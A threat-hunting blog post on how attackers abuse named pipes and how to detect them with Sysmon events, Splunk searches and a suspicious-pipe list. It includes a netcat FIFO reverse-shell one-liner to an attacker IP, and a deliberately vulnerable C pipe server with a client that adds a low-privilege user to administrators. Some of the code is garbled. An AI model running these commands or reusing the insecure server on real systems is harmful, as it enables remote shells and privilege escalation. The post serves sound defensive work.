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Threat Hunting - Suspicious Named pipes


simulation and detection

What are Named Pipes?

Named pipes are a mechanism for inter-process communication (IPC) in Windows operating systems. They enable processes to communicate with each other, either on the same machine or over a network, by providing a reliable way to transfer data between applications. Named pipes facilitate bidirectional communication and can handle multiple client connections simultaneously. In contrast, in Linux, we have two types of pipes: pipes (also known as anonymous or unnamed pipes) and FIFO’s (also known as named pipes)

How Pipes Work on Linux

Pipes in Linux connect commands, allowing the output of one command to be used as the input for another, creating a pipeline. For example netstat -tlpn | grep filters network connections to localhost, and netstat -tlpn |& grep merges and filters both standard output and error.

illustration FIFO from

Named pipes in Linux (or FIFOs) are special files that allow multiple processes to read from and write to them, enabling bidirectional communication. They have attributes like ownership and permissions, just like regular files. You can create a FIFO with commands like mkfifo or mknod. Named pipes can be combined with other commands to create applications, such as a reverse shell using netcat.


netcat reverse shell scenario:/bin/sh -i < /tmp/fifo 2>&1 | nc attacker_ip 4444 > /tmp/fifo)

< /tmp/fifo: This redirects the standard input of the shell to read from the named pipe /tmp/fifo, the shell will read its input from this pipe.

> /tmp/fifo: This redirects the output from nc (which is the input from the attacker's machine) back into the named pipe /tmp/fifo. This means any input from the attacker gets sent back into the shell as if it was typed directly into the shell's input.

  • Anonymous Pipe: ls | grep txt (Anonymous pipes are created automatically by the shell and are used for inter-process communication (IPC) within the same command line)
  • Named Pipe: mkfifo PrivescPipe_Linuxcreates a FIFO for shared access (Unlike anonymous pipes, named pipes are created in the filesystem and can be accessed by multiple processes independently)

The file has a special type indicated by ap in the permissions (prw-r--r--) in this example, the p indicates that the file is a named pipe (FIFO)

write to the pipe: echo “1337” > /root/PrivescPipe_Linux

Use find / -type p to find named pipes locations orlsof | grep FIFO to display processes accessing FIFOs. The output includes details such as PID, PPID, user, and permissions.

How Named Pipes Work on Windows


A server process creates a named pipe using the CreateNamedPipe function, specifying the name, direction (inbound, outbound, or duplex), and other attributes. This function sets up the pipe with the necessary parameters for communication.


Client processes connect to the pipe using the CreateFile function, specifying the pipe's name. Multiple clients can connect to the same named pipe, enabling one-to-many communication. This flexibility allows various clients to interact with the server through a single communication channel.


Data is read from and written to the pipe using standard file I/O functions like ReadFile and WriteFile. Named pipes support message-oriented communication, ensuring that data is sent and received in discrete units. This method of communication helps in maintaining data integrity and order.

  • Local IPC: Named pipes are often used for communication between components of a single application or between different applications running on the same machine.
  • Remote IPC: They are also used for communication between applications on different machines over a network, providing a secure and efficient means of data transfer.
  • Client-Server Communication: Named pipes facilitate client-server models, where multiple clients can interact with a server process, commonly seen in database and web server applications.
example illustration


Named pipes have associated security attributes that control access. When creating a named pipe, the server can specify a security descriptor that defines who can access the pipe and what operations they can perform (read, write, etc.). This ensures that only authorized processes can communicate through the pipe, providing a layer of security.


Named pipes support client impersonation, where the server can assume the security context of the client. This allows for fine-grained access control, enabling the server to perform actions on behalf of the client with the client’s privileges. Check out this article from Jonathan Johnson to learn how ImpersonateNamedPipeClient function operates.

Here is a POC exploiting named pipe impersonation for Privilege Escalation, also depending on engagement goals, an attacker might use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation to access a system with specific low-privileged user accounts such as the CEO, HR, SAP administrators, and others.

Malicious Use of Named Pipes

Modulated Implants
Named pipes are used for communication between malicious child processes and the implant core, often in conjunction with keyloggers. This setup allows for efficient data exfiltration and control of compromised systems.

Privilege Escalation
The Potato exploits leverages named pipes for privilege escalation. Even Metasploit’s “Get-System” exploit uses named pipes and impersonation to gain elevated privileges on compromised systems. Print Spooler named pipe impersonation tricks associated with multiple vulnerabilities are often used to gain SYSTEM privileges.

C2 implants can listen on a named pipe, providing a persistent backdoor. This method eliminates the need for beacons or open ports, making detection more challenging while maintaining a constant foothold in the compromised system.

C2 Pivoting with Named Pipes

Named pipes can be exploited for C2 pivoting. Attackers can establish a named pipe on a compromised system and use it to relay commands and data between the attacker-controlled systems and other compromised endpoints within the network. This technique allows for stealthy lateral movement, as named pipes are a legitimate feature of the Windows operating system and can evade some detection mechanisms. Monitoring named pipe creation and communication patterns can help in detecting such malicious activities.

For more information on C2 pivoting using named pipes, check out the following resources:

More recently an update in Cobalt Strike 4.10, “Through the BeaconGate,” includes a new technique using named pipes for Beacon’s peer-to-peer communication and allows operators to proxy Beacon’s Windows API calls through a Sleepmask BOF for advanced evasion. This enhances lateral movement capabilities

Common Tools and Techniques for Monitoring Named Pipes

  • Sysmon: Microsoft’s Sysmon tool is highly configurable, allowing for detailed logging of named pipe events (connection Event ID 18 + creation Event ID 17). It provides excellent control over verbosity and coverage, making it the best tool for monitoring and detecting suspicious named pipe activities.
  • Wireshark: Wireshark can be used to capture pipe activity within wire data (for SMB smb_pipe.getinfo.pipe_name, or look for the Tree Id in SMB Header)
  • Splunk Stream and Zeek can also be used to capture pipe activity within wire data, check out this Splunk article using this data
  • EDR: Some EDR are logging named pipes partially like the EDR Crowdstrike, MDE, Harfanglab or Trellix
  • Auditd: Monitor named pipe creation on Linux using auditd by tracking mknod system calls and execve for command-line patterns. Also, monitor creat, open, and openat for file creation, and splice for detecting detect Dirty pipe exploitations)

Practical Example on Windows

In this example, we create a vulnerable pipe server application that allows access to all users, regardless of their privilege level.

This is my pipe_server.c

#include <windows.h>
#include <stdio.h>
#include <aclapi.h>

#define PIPE_NAME "\\\\.\\pipe\\PrivEscPipe"
#define BUFFER_SIZE 1024

void main() {
char buffer[BUFFER_SIZE];
DWORD bytesRead;
// Define a security descriptor that allows access to everyone
InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);
// Define the security attributes structure
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = &sd;
sa.bInheritHandle = FALSE;
// Create a named pipe
hPipe = CreateNamedPipe(
PIPE_NAME, // pipe name
PIPE_ACCESS_DUPLEX, // read/write access
PIPE_TYPE_MESSAGE | // message type pipe
PIPE_READMODE_MESSAGE | // message-read mode
PIPE_WAIT, // blocking mode
BUFFER_SIZE, // output buffer size
BUFFER_SIZE, // input buffer size
0, // client time-out
&sa); // security attributes

printf("CreateNamedPipe failed, GLE=%d.\n", GetLastError());
// Wait for the client to connect
printf("Waiting for client connection...\n");
BOOL connected = ConnectNamedPipe(hPipe, NULL) ?
if (connected) {
printf("Client connected.\n");
BOOL success = ReadFile(
buffer, // buffer to receive data
sizeof(buffer) - 1, // size of buffer
&bytesRead, // number of bytes read
NULL); // not overlapped I/O
if (success) {
buffer[bytesRead] = '\0'; // Null-terminate the string
printf("Received: %s\n", buffer);
// execute received command
if (system(buffer) != 0) {
printf("Command execution failed.\n");
} else {
printf("ReadFile failed, GLE=%d.\n", GetLastError());
} else {
printf("Client connection failed.\n");

and this is my pipe_client.c:

#include <windows.h>
#include <stdio.h>
#include <string.h>

#define PIPE_NAME "\\\\.\\pipe\\PrivEscPipe"

void main() {
DWORD bytesWritten, bytesRead;
char exploitCommand[] = "net localgroup administrateurs lowprivuser /add";
// Connect to the named pipe
hPipe = CreateFile(
PIPE_NAME, // pipe name
GENERIC_READ | // read and write access
0, // no sharing
NULL, // default security attributes
OPEN_EXISTING, // opens existing pipe
0, // default attributes
NULL); // no template file
printf("Failed to connect to pipe, GLE=%d.\n", GetLastError());
// Send the command to the server
if (!WriteFile(
NULL)) {
printf("WriteFile failed, GLE=%d.\n", GetLastError());
} else {
printf("Sent exploit command to server.\n");

After compiling, I executed pipe_server.exe in an elevated terminal, using PipeViewer, you can check all the pipes opened on your system

We can see our vulnerable application with no DACL, allowing full permissions, executed with high privileges.
These permissions can also be viewed using accesschk

.\acesschk.exe \pipe\ to list all the pipes and their permissions

FYI you can also use these tools to list all named pipes:

  • Sysinternals PipeList: to list all the pipe using NtQueryDirectoryFile
  • Sysinternals PSFile: to list all open files (grep named pipes with | findstr pipe)
  • With powershell: [System.IO.Directory]::GetFiles("\\.\\pipe\\") or Get-ChildItem \\.\pipe\
  • Process Explorer or Process Hacker: Use the “Find Handles or DLLs” feature and search for \Device\NamedPipe to find all the named pipes.

With the pipe server now listening, I executed pipe_client.exe in a standard terminal. The pipe client application successfully connected to the named pipe PrivEscPipe created by pipe_server.exe and sent a command to add a user named lowprivuser to the administrateurs group.

executing pipe_client.exe and pipe_server.exe

The command is received and executed with high privileges by the pipe_server.exe
This demonstrates a critical vulnerability where a low-privilege user can escalate their privileges by exploiting the insecure pipe server application we created.

Logs generated

I did not find any ETW provider that specifically logs the creation or connection of named pipes.

However, Sysmon can log these events with Event ID 17 for pipe creation and Event ID 18 for pipe connection.

Event ID 17 captures pipe creation details from our previous test:

We can see our pipe “PrivEscPipe” that was created by our application pipe_server.exe

Event ID 18 captures pipe connection details:

We can see our pipe client application connecting to the PrivescPipe pipe !

In an investigation scenario triggered by an alert for a suspicious named pipe usage, we have several valuable pieces of information to pivot on:

  • Parent Process ID: 5544 (in this example, the terminal process ID)
  • Process ID of pipe_client.exe: 16928
  • Process ID of pipe_server.exe: 28564

We also have the executable names for both the pipe creator and the pipe connector:

  • Creating the named pipe: pipe_server.exe
  • Connecting to the named pipe: pipe_client.exe

To gather more context, we can search for these executable names or process IDs within the detection time range. This will help us better understand the server and client applications involved. We will retrieve more context and the hash of each application from Sysmon Event ID 7 or Event ID 1. Depending on the application’s behavior, further details might be available through Sysmon Event IDs 8, 10, and 3.

EventID 7 showing that the pipe_server.exe was executed, and the image was loaded into memory on the system.
EventID 1 showing the execution of pipe_server.exe with admin rights
EventID 1 showing the execution of pipe_client.exe without admin rights

At this point, you have gathered all the necessary details: the machine(s), the process and parent process information, the user who created the pipe, the user who connected to the pipe, the hash of the executables, relevant Event IDs generated by each application (depending on the service provided by each application - not limited to sysmon logs), and the pipe name itself.

When analyzing named pipes, the initial focus should be on the pipe name, as it is defined by the developer. A unique pipe name can be a significant indicator for identifying specific applications or malware, aiding in threat intelligence and forensic investigations. Therefore, determining the uniqueness of the pipe name is a critical first step. This can help in correlating the pipe usage with known protocols, tools or threat actor techniques and facilitate a more targeted and effective analysis.

Here are some known named pipe associated with various protocols and services in Windows:

RPC Protocol:

  • \\.\pipe\epmapper
  • \\.\pipe\lsass
  • \\.\pipe\samr
  • \\.\pipe\initshut
  • \\.\pipe\ntsvcs
  • \\.\pipe\scerpc

SQL Server:

  • \\.\pipe\sql\query
  • \\.\pipe\MSSQL$<instance_name>\sql\query

Netlogon Service:

  • \\.\pipe\netlogon

Print Spooler Service:

  • \\.\pipe\spoolss

Task Scheduler:

  • \\.\pipe\atsvc

RPC over SMB:

  • \\.\pipe\netdfs

Windows Event Log:

  • \\.\pipe\eventlog

Remote Desktop :

  • \\.\pipe\termsrv
  • \\.\pipe\TSVCPIPE-*

Service Control Manager Remote Protocol:

  • \\.\pipe\svcctl (also used by many Lateral movement tool)

WebDAV service:

  • \\.\pipe\DAV RPC SERVICE


  • \\.\pipe\lsass (When dumping LSASS for credential access, you may observe a ‘pipe connect’ to \\.\pipe\lsass initiated by the responsible process. For instance, C:\Windows\System32\Taskmgr.exe or procdump may establish a connection to \\.\pipe\lsass

SMB Protocol (Hunt for Lateral Movement):

  • \\.\pipe\srvsvc
  • \\.\pipe\wkssvc
  • \\.\pipe\browser

Just a quick note for lateral movement pivot investigations: When investigating lateral movement with named pipes, pivot on the PID with Sysmon Event ID 3 for network access. Observe Security EventID 5140 or 5145 on the target machine for network share access. Correlate with connection Event IDs 4624, 4625, and 4648 for logon activities. Also, correlate with Sysmon Event ID 1 or Security Event ID 4688 for process execution context, and System Event IDs 7045, 7036, or Security Event ID 4697 for service installations by PSEXEC-like tools. For RDP connections, specifically check Event ID 4624 for Logon Type 3 or 10 (both could be generated depending on the SMB configuration). You can also confirm RDP connections in the Microsoft-Windows-TerminalServices-LocalSessionManager/Operational and Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational logs.

I won’t list every known named pipe here, but a quick Google search will often reveal their meanings, they are widely used and well-documented.

Suspicious Named pipe

I’ve dedicated a significant amount of time to analyzing tools locally and gathered unique named pipes from various tools, threat intelligence reports, sandboxes, and multiple sources. This effort has resulted in a collection of nearly 300 suspicious named pipes (as of 2024/07/21).
Each named pipe is categorized for a detailed detection.

I know that many lateral movement tools are using legitimate default pipe names used by Windows services. I am not adding all of them to my list. Instead, a dedicated detection rule that correlates multiple events from different log sources, along with some default named pipes, is preferable for identifying suspicious activity involving default pipes. I also didn’t include suspicious Linux named pipes in the list because they are essentially files and are detected with command line and file path patterns with auditd as mentionned before.

You can access my detection list here

Here’s a sample of what the list looks like:

Description of the List Headers:

pipe_name: The specific name of the pipe to detect or a pattern used for identifying the named pipe.

Metadata_description: A brief description of the associated tool.
Metadata_tool: The name of the tool associated with the named pipe detection.

Metadata_category: The category of the tool to help select a specific tool category in our hunt. Categories include: C2, Collection, Compliance, Credential Access, Data Exfiltration, Defense Evasion, Discovery, Exploitation, Lateral Movement, Malware, Persistence, Privilege Escalation, Ransomware, Reverse Engineering, RMM, VPN

Metadata_link: The link to the tool or the article where the named pipe was found. For tools analyzed personally, a link to the tool or my repository is provided.

Metadata_priority: The urgency level assigned to the detected tool.

  • info: Not urgent, likely a legitimate tool or for compliance detection, used for threat hunting and correlation only.
  • low or medium: Low urgency, probably associated with legitimate tools that could be abused by threat actors (greyware_tool), reserved for threat hunting sessions.
  • high: Needs quick investigation as the tool observed could have a significant impact but may also be attributed to legitimate tools that could be abused by threat actors.
  • critical: Top priority, the tool detected could have significant impact if not quickly remediated.

Metadata_fp_risk: The potential for false positives for the detection pattern (Pipe_name).

  • N/A: No known false positives for now (or not necessary to be tested).
  • none: Very high chance of not generating any false positives and not observed so far.
  • low: Low chance of generating a false positive detection.
  • medium: Will probably generate false positives as the pattern is too generic or too short and could match other tools.
  • high: Very likely to produce false positives, very verbose detection (reserved for threat hunting sessions).

Metadata_severity: The severity assigned to the detection, taking into account the priority and false positive risk.

  • info: Legitimate tools, only for correlation or compliance for some tools.
  • low: Low severity detection (reserved for threat hunting sessions).
  • medium: Medium severity detection.
  • high: High severity detection, each requires investigation (could be in threat hunting sessions or detection rules).
  • critical: Critical severity, the tool could be very dangerous and a highly relevant indicator, requiring immediate investigation (could be in threat hunting sessions or detection rules).


  • offensive_tool: This is an offensive tool, not used legitimately.
  • greyware_tool: This is a legitimate tool that is abused by threat actors.


  • Hunting: Indicates the detection pattern is best suited for threat hunting sessions. It is designed to identify potential threats through proactive investigation rather than generating immediate alerts.
  • Detection Rule: Indicate that the detection pattern is a reliable indicator of malicious activity. It can be implemented in detection rules to generate relevant alerts, ensuring timely and accurate threat response.

Metadata_comment: Additional comments about the detection.

Metadata_reference: Link to the tool or the source where the detection is documented.

Many lateral movement tools use legitimate default pipe names employed by Windows services. I am not adding all of them to my list. Instead, a dedicated detection method that correlates multiple events from different log sources, along with specific named pipes, is preferable for identifying suspicious activity involving these pipes.

Threat Intelligence

Named pipes are often overlooked in IOC gathering within public reports and sandboxes. If analyzing a sample directly is not possible, pay close attention to the “Files Opened” artifacts in public sandboxes (if available) !

VirusTotal leverages Sysinternals tools within the “Behavior” tab to log named pipe activities

Here are some interesting GitHub projects exploiting or using named pipes that should be added to the ThreatHunting-Keywords project, along with additional detection patterns beyond just named pipes:

If you have the chance to analyze open-source code, you can potentially save time by extracting named pipes using these regex patterns:

'NamedPipe_C':r'new PipeServer\<PipeMessage\>\(.+?(?=\))',

How to Hunt for suspicious named pipe with the list

With Splunk, it’s straightforward. First, upload my list to Splunk and name it suspicious_named_pipe_list.csv. Then, create a lookup definition named suspicious_named_pipe_list linked to suspicious_named_pipe_list.csv, ensuring it is not case-sensitive and allows wildcard matches on the field pipe_name.

Use this search to find all named pipes reserved for Threat Hunting sessions (filter on metadata_usage "Hunting"):

`sysmon` signature_id IN (17,18) pipe_name=*
[| inputlookup suspicious_named_pipe_list | fields - metadata_*]
NOT [| inputlookup sysmon_exclusion_list | fields - metadata_*]
| lookup suspicious_named_pipe_list pipe_name as pipe_name OUTPUT pipe_name as
pipe_name_detection_pattern metadata_category metadata_comment metadata_description
metadata_fp_risk metadata_link metadata_priority metadata_severity metadata_usage metadata_tool metadata_tool_type metadata_reference
| where metadata_usage="Hunting"
| stats count
values(process_id) as process_id
values(process_guid) as process_guid
values(process_path) as process_path
values(process_name) as process_name
values(signature_id) as signature_id
earliest(_time) as firsttime
latest(_time) as lasttime
by src_nt_host src_user pipe_name metadata_tool pipe_name_detection_pattern metadata_category metadata_tool_type metadata_usage metadata_comment
metadata_description metadata_fp_risk metadata_link metadata_priority metadata_severity metadata_reference

Use this search to find all relevant named pipes for Detection rules (filter on metadata_usage "detection rule"):

`sysmon` signature_id IN (17,18) pipe_name=*
[| inputlookup suspicious_named_pipe_list | fields - metadata_*]
NOT [| inputlookup sysmon_exclusion_list | fields - metadata_*]
| lookup suspicious_named_pipe_list pipe_name as pipe_name OUTPUT pipe_name as
pipe_name_detection_pattern metadata_category metadata_comment metadata_description
metadata_fp_risk metadata_link metadata_priority metadata_severity metadata_usage metadata_tool metadata_tool_type metadata_reference
| where metadata_usage="detection rule"
| stats count
values(process_id) as process_id
values(process_guid) as process_guid
values(process_path) as process_path
values(process_name) as process_name
values(signature_id) as signature_id
earliest(_time) as firsttime
latest(_time) as lasttime
by src_nt_host src_user pipe_name metadata_tool pipe_name_detection_pattern metadata_category metadata_tool_type metadata_usage metadata_comment
metadata_description metadata_fp_risk metadata_link metadata_priority metadata_severity metadata_reference

Search for every pipe name in my list:

`sysmon` signature_id IN (17,18) pipe_name=*
[| inputlookup suspicious_named_pipe_list | fields - metadata_*]
NOT [| inputlookup sysmon_exclusion_list | fields - metadata_*]
| lookup suspicious_named_pipe_list pipe_name as pipe_name OUTPUT pipe_name as
pipe_name_detection_pattern metadata_category metadata_comment metadata_description
metadata_fp_risk metadata_link metadata_priority metadata_severity metadata_usage metadata_tool metadata_tool_type metadata_reference
| where metadata_usage="detection rule"
| stats count
values(process_id) as process_id
values(process_guid) as process_guid
values(process_path) as process_path
values(process_name) as process_name
values(signature_id) as signature_id
earliest(_time) as firsttime
latest(_time) as lasttime
by src_nt_host src_user pipe_name metadata_tool pipe_name_detection_pattern metadata_category metadata_tool_type metadata_usage metadata_comment
metadata_description metadata_fp_risk metadata_link metadata_priority metadata_severity metadata_reference

`sysmon` is a macro searching in your sysmon logs replace it with your own macro or index/sourcetype combinaison.

Feel free to add more filters based on the severity, priority, fp_risk, tool, category, usage or type for increased granularity.
For example, to hunt for the usage of RMM tools

you can add this filter |where metadata_category="RMM" !

If you want to hunt for lateral movement tools usage: |where metadata_category="Lateral Movement"

Similarly, you can filter your searches for specific needs by applying filters such as:

  • Severity: | search metadata_severity IN ("high","critical")
  • Priority: | where metadata_priority="critical"
  • Low False Positive Risk: | search metadata_fp_risk IN ("none","N/A","low")
  • Tool CobaltStrike: | where metadata_tool="CobaltStrike"
  • Usage: | where metadata_usage="detection rule"
  • Type: | where metadata_tool_type="offensive_tool"
  • Category: | where metadata_category="Privilege Escalation"

Hunting without the list

Unsigned processes creating pipes

`sysmon` signature_id=17 
NOT [|inputlookup Sysmon_exclusions.csv | fields - metadata_*]
| stats earliest(_time) as firsttime latest(_time) as lasttime
count by pipe_name process_path signature_id src_nt_host
| join process_path src_nt_host
[search `sysmon` signature_id
=7 Signed=false
| table src_nt_host process_id process_path parent_process_path Company Signed]
| search NOT [|inputlookup Unsigned_processes_creating_pipes.csv | fields - metadata_*]

We first search Sysmon Event ID 17 for created pipes, then pivot on the process_path in Event ID 1 to check if the executable creating the pipe is signed. You could change the join from “process_path src_nt_host” to “process_id src_nt_host” (ensure these fields are correctly parsed in your Sysmon logs).

This search is reserved for threat hunting, requiring significant triage but potentially giving us interesting results. For my test:

Unsigned processes creating pipes

While writing this detection, I discovered a valuable Lateral Movement hunting guide by Ankith Bharadwaj that also mentions named pipes and includes other hunting searches worth reading :)

Suspicious communication with Pipes in command lines

signature_id IN (1,4688)
process IN
"*echo * > \\\\.\\Pipe\\*",
"*copy * \\\\.\\Pipe\\*",
"*type * > \\\\.\\Pipe\\*"

This search is designed to detect potentially suspicious command line activities involving named pipes, a technique commonly used in various attack frameworks, including CobaltStrike. By focusing on specific commands (echo, copy, type) that interact with named pipes, aiming to identify behaviors that may indicate privilege escalation

Pipes events from suspicious directories

This search detect potentially malicious activities by monitoring named pipe events in directories often used by attackers.

signature_id IN (17,18)
process_path IN

Suspicious Powershell hosts

NOT (Image IN (
"*:\\Program Files\\PowerShell\\7-preview\\pwsh.exe",
"*:\\Program Files\\PowerShell\\7\\pwsh.exe",
"*:\\Program Files\\Microsoft SQL Server\\*\\Tools\\Binn\\SQLPS.exe",
"*:\\Program Files\\Citrix\\*",
"*:\\Program Files\\Microsoft\\Exchange Server\\*"

There is a sigma rule for everything now 🎉
This search helps identifies alternative PowerShell hosts that may evade detections (pipe not matching known legitimate processes, indicating potential misuse or anomalous activity)

Testing this with the famous tool Powershdll and we have a match :)

ADFS Database Named Pipe Connection By Uncommon Tool

signature_id IN (17,18)
Image IN (

From a sigma rule by @Cyb3rWard0g that detects suspicious local connections to the AD FS configuration database !

Uncommon Named Pipes Detection

Incorporating the usual behavior of certain processes can help us identify anomalies when those processes use unexpected named pipes. For instance, if powershell.exe creates a named pipe other than an anonymous pipe or the \PSHost* pipe, it might be suspicious and worth investigating. This approach is primarily for threat hunting and large-scale triage, provided you have sufficient telemetry. It will likely generate a substantial volume of results to review.

Initial Search: Collect Named Pipe Relationships in Your Environment

Run the following search once every three months to gather named pipe relationships. Note that this search may take some time to complete:

`sysmon` signature_id IN (17,18) earliest=-90d latest=now
[| inputlookup named_pipes_list.csv | fields - metadata_*]
NOT [| inputlookup named_pipes_exclusions.csv |fields - metadata_*]
| fields pipe_name process_path signature_id
| dedup pipe_name process_path signature_id
| collect index=known_named_pipes_relation sourcetype=stash

named_pipes_list.csvcontains a list of named pipes or process paths we want to monitor andnamed_pipes_execlusions.csv contains default exclusions for name pipes pattern as some will contain random strings after a static pattern, several default exclusions are necessary, search without the lookups first to have an idea of which named pipes are used in your environment and which ones will need an exclusion

Second Search: Identify Unknown Named Pipes Patterns by Known Processes

 `sysmon` signature_id IN (17,18)
NOT [| inputlookup named_pipes_exclusions.csv |fields - metadata_*]
| search
NOT [| search index
=known_named_pipes_relation sourcetype=stash
earliest=-90d latest=now
|fields pipe_name process_path signature_id]
| stats count
earliest(_time) as firsttime
latest(_time) as lasttime
by src_nt_host src_user pipe_name process_path signature_id index sourcetype
| sort - count

Uncommon Named pipes Execution via IPC$ with EID 5145

Seeing IPC$ in the share path of a Microsoft Event ID 5145 typically indicates an attempt to access the inter-process communication share on a Windows machine. While this activity is often legitimate, it could also indicate a lateral movement within the network.

The relativeTargetName field will contain the specific named pipe used. Similar to the two searches mentioned above, you can gather and analyze the named pipe relationships in your environment by monitoring the IPC$ share path used with the EventID 5145. This allows you to detect and flag any uncommon or suspicious named pipes associated with the IPC$ share.

Suspicious process running as SYSTEM connecting to Named Pipes

process_name IN (powershell.exe, powershell_ise.exe, cmd.exe, wmiprvse.exe, spoolsv.exe, rundll32.exe, wscript.exe, cscript.exe, mshta.exe)

It could help detect some Named Pipe exploitations, it’s better to use the user SID instead of the username, as usernames can vary with system language settings.

Besides these specific searches with named pipe, I don’t have additional hunting searches to recommend at this time. Establishing a baseline and detecting anomalies with these logs is challenging, and you may not have sufficient telemetry (depending on your environment). Collecting such data on a large scale with Sysmon without filters can result in overwhelming volumes of data. Instead, I prefer focusing on known malicious and suspicious named pipes using my list and some other known named pipe associated with various protocols (SMB, RPC, SQL…). You can adapt your Sysmon configuration to include all the pipe names in my list if you want to really control the verbosity.

    <PipeEvent onmatch="include">
<PipeName condition="is">...

I hope you’ll find the list and the hunting searches valuable. Your feedback is always welcome!

Happy Hunting !

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Written by mthcht

Threat Hunting - DFIR - Detection Engineering

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